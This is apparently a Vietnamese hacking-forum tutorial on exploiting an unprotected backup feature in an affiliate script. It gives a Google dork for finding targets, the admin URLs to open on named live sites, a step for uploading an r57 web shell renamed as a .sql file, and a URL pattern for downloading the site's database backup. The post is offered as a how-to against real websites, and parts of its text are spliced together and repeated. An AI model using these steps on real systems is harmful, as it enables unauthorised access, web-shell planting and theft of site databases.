Bug backup và cách khai thác
Bug này khá nguy hiểm tuy cũ nhưng vẫn còn nhiều side dính .Google seach
kết quả khá nhiều , thử con
Bây giờ ta thay index.php?Act=Merchants bằng /admin/dump
Ơ dính rồi kìa.Giữ lấy trang này bây giờ thử newtab và thay Nhớ lấy cái ngày thắng nó rất quan trọng đấy ./admin/dump bằng admin/backupstart.php coi nào
Hô hô ra cái j` thế này
Có chỗ upload kìa thử up con shell r57 lên coi thế nào. Chú ý đổi con shell thành r57.php.sql hoặc r57.sql tùy theo side mà thay. Con shell tớ up lên.
Ơ kìa sao con shell lại như thế này nhỉ? Chả hiểu nổi , ai giải thích giùm với.
Thử cách khác vậy.
Thử down load cái nó back up coi ntn dùng /admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql
dd-mm-yyyy.sql thay bằng ngày tháng bạn thấy ở phía dưới
ok đến đây thôi nhé.
Code:
allinurl: "index.php?Act=Merchants"
Code:
http://www.zepub.com/index.php?Act=Merchants
Code:
http://www.zepub.com/admin/dump
Hô hô ra cái j` thế này
Code:
http://www.zepub.com/admin/backupstart.php
Code:
http://www.zepub.com/admin/dump/r57kilo.sql
Thử cách khác vậy.
Thử down load cái nó back up coi ntn dùng /admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql
Code:
http://www.affiliation01.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql
ok đến đây thôi nhé.